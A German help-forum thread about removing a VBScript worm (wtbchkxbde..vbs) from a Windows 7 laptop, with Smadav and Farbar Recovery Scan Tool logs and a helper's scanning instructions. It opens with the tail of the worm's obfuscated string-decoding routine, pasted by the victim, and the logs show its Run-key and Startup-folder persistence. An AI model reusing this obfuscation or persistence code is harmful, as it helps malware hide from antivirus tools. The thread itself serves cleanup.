FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq =  Int( ( Len(FOFwEQObHcOMduGpSoigGYvXJZN) - 1 + 1 ) * Rnd + 1 )
FOFwEQObHcOMduGpS = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZNxD)
FOFwEQObHcOMduGpSo = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZN)
For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to UBound( FOFwEQObHcOMduGpS ) - 1
FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq
If FOFwEQObHcOMduGpSoi > UBound(FOFwEQObHcOMduGpSo) Then
Dim FOFwEQObHcOMdu
FOFwEQObHcOMdu = Int(FOFwEQObHcOMduGpSoi / (UBound(FOFwEQObHcOMduGpSo) + 1))
Dim FOFwEQObHcOMd
FOFwEQObHcOMd = ((UBound(FOFwEQObHcOMduGpSo) + 1 ))
FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoi - FOFwEQObHcOMd * FOFwEQObHcOMdu
End If
FOFwEQObHcOMduGp = FOFwEQObHcOMduGpS(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO) - FOFwEQObHcOMduGpSo(FOFwEQObHcOMduGpSoi)
If FOFwEQObHcOMduGp < 0 Then
FOFwEQObHcOMduGp = FOFwEQObHcOMduGp + 256
End If
dim FOFwEQObHcOM
FOFwEQObHcOM = Chr(FOFwEQObHcOMduGp)
FOFwEQObHcOMduG = FOFwEQObHcOMduG & FOFwEQObHcOM
NEXT
FOFwEQObHcOMduGpSoigGYvXJZNxDE = FOFwEQObHcOMduG
End Function

Mein Avira (zuletzt aktualisiert am 14.3.14) erkennt keinen Virus.
Habe mir einen anderen Antivirus organisiert (Smadv, Version vom 22.1.14).
Dieser erkennt den Virus und findet die .vbs auch unter "C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", nach dem Entfernen durch den Antivirus kommt die .vbs aber sofort wieder.

Folgendes Log wurde erstellt:
Code:

==============================
Log File of Smadav 2014 Rev. 9.6
==============================

Scanning Results :
=> Time & Date : 11:12:39, on 04-09-2014
=> Finishing Time : 36 minutes,17 seconds
=> Folder Scanned :31530
=> File Scanned : 204327
=> File Detected : 2
=> File Cleaned : 0
=> File Skipped : 0
=> Value Scanned : 1234
=> Value Detected: 0
=> Value Fixed: 0
=> Path Scanned: 0
=> Path Hidden: 0
=> Path Unhidden: 0

==============================
Before Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> Fine(Level 2) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> Fine(Level 2) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process
  -C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\Launch Manager\LManager.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Launch Manager\LMworker.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\iTunes\iTunes.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> Fine(Level 1) as  : 1 Process
  -C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Program Files\NetLimiter 3\NLClientApp.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> Fine(Level 1) as  : 1 Startup
  -C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe

Running Processes :
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wininit.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> N/A
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
=> N/A
=> C:\Windows\explorer.exe
=> N/A
=> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> N/A
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wscript.exe
=> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> C:\Program Files (x86)\Launch Manager\LManager.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> C:\Program Files (x86)\Launch Manager\LMworker.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Program Files (x86)\iTunes\iTunes.exe
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\SearchIndexer.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> N/A
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> N/A
=> N/A
=> N/A
=> C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe
=> C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> N/A

==============================
After Scanning
==============================
Suspected Paths :
=> Unknown(Level 3) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> Unknown(Level 3) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> Unknown(Level 3) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
=> Unknown(Level 3) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process
  -C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\Launch Manager\LManager.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
  -C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Launch Manager\LMworker.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\iTunes\iTunes.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> Fine(Level 1) as  : 1 Process
  -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> Fine(Level 1) as  : 1 Process
  -C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Program Files\NetLimiter 3\NLClientApp.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
=> Fine(Level 1) as  : 1 Startup
  -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> Fine(Level 1) as  : 1 Startup
  -C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe

Running Processes :
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wininit.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> N/A
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
=> N/A
=> C:\Windows\explorer.exe
=> N/A
=> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> N/A
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wscript.exe
=> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> C:\Program Files (x86)\Launch Manager\LManager.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> C:\Program Files (x86)\Launch Manager\LMworker.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Program Files (x86)\iTunes\iTunes.exe
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\SearchIndexer.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> N/A
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> N/A
=> N/A
=> N/A
=> C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe
=> C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> N/A
=> C:\Windows\System32\SearchProtocolHost.exe
=> C:\Windows\System32\SearchFilterHost.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
=> N/A
=> N/A

Detected Virus :
=> VBS.Encrypted.B
  -Infected File
  -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> New Heur.FFD(VBS)
  -Infected File
  -E:\wtbchkxbde..vbs

weiterhin auffällig:
Mein Laptop hängt sich seit dem Virusbefall ohne Belastung (Word oder Spidersolitär) manchmal auf (bis jetzt 4 mal seit einer Woche)
Seit ich smadav benutzt habe sind meine Desktopsymbole schmaler und näher nebeneinander (Höhe ist normal). Keine Ahnung ob das mit dem Virus zu tun hat, falls jemand zufällig eine Lösung dafür hat wäre das sehr nett.

Ich komme nur sehr unregelmäßig online, versuche aber etwaige Fragen schnell zu beantworten

Hier im Dorf ist der Virus anscheinend auf jedem PC, ein ganzer Stamm wird euch also dankbar sein für jegliche Hilfe :)

Viele Grüße aus dem Dschungel
Franz

schrauber 13.04.2014 13:13

hi,

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)


fxak 14.04.2014 09:56

Danke für die schnelle Antwort!

FRST.txt:

FRST Logfile:

FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 14-04-2014 10:43:32
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal



==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Windows\system32\igfxtray.exe
(Intel Corporation) C:\Windows\system32\hkcmd.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
